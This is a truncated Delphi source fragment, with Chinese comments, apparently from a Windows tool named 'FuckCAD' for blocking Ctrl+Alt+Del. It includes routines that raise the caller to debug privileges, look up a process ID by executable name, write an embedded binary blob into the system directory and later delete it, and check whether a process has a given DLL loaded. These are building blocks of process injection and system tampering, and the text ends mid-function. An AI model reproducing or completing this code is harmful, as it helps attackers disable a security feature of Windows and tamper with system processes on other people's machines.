procedure RunFuckCAD;
procedure StopFuckCAD;

implementation

procedure GetDebugPrivs;  //提升到Debug权限
var
  hToken: THandle;
  tkp: TTokenPrivileges;
  retval: dword;
begin
  If (OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken)) then
  begin
    LookupPrivilegeValue(nil, ''SeDebugPrivilege''  , tkp.Privileges[0].Luid);
    tkp.PrivilegeCount := 1;
    tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    AdjustTokenPrivileges(hToken, False, tkp, 0, nil, retval);
  end;
end;

function NameToPID(ExeName:pchar):longword;
//通过进程文件名返回一个Pid，如果多个同名进程返回第一个进程的Pid
  var
    hSnap:longword;
    ProcessEntry: TProcessEntry32;
    c:boolean;
  begin
    result:=0;
    hSnap:= CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    ProcessEntry.dwSize:= Sizeof(TProcessEntry32);
    c:= Process32First(hSnap,ProcessEntry);
    While c  do
      begin
        if LstrcmpiA(ExeName,ProcessEntry.szExeFile)= 0 then
           begin
             result:=ProcessEntry.th32ProcessID;
             break;
           end;
        c:=Process32Next(hSnap,ProcessEntry);
      end;
    CloseHandle(hSnap);
  end;

function GetSysPath:pchar;  //最后没加''/''
  var
   a:pchar;
  begin
   GetMem(a,255);
   GetSystemDirectory(a,255);
   Result:=a;
  end;

procedure DelKernel;
  begin
    DeleteFile(pchar(string(GetSysPath)+''\''+string(MyKernel))) ;
  end;

function CreateKernelFile(SaveFile:String):Boolean;
  var
    hFile:THandle;
    BytesWrite: dword;
  begin
    Result:=False;
    hFile := CreateFile(Pchar(SaveFile),GENERIC_READ or GENERIC_WRITE,FILE_SHARE_READ,nil,CREATE_ALWAYS,0,0);
    if hFile = INVALID_HANDLE_VALUE then Exit;
    if WriteFile(hFile,MyKernelBuf,MyKernelSize, BytesWrite, nil) then Result:=True;
    CloseHandle(hFile);
  end;

Function  GetModule(ProcessName,ModuleName:Pchar):longword;
//This is a function written by Hke.
//检查进程是否加载DLL，是返回指针，否返回0
  var
    PID:longword;
    hModuleSnap:longword;
    ModuleEntry: TModuleEntry32;
  begin
    Pid:=NameToPID(ProcessName);
    GetDebugPrivs;
    hMod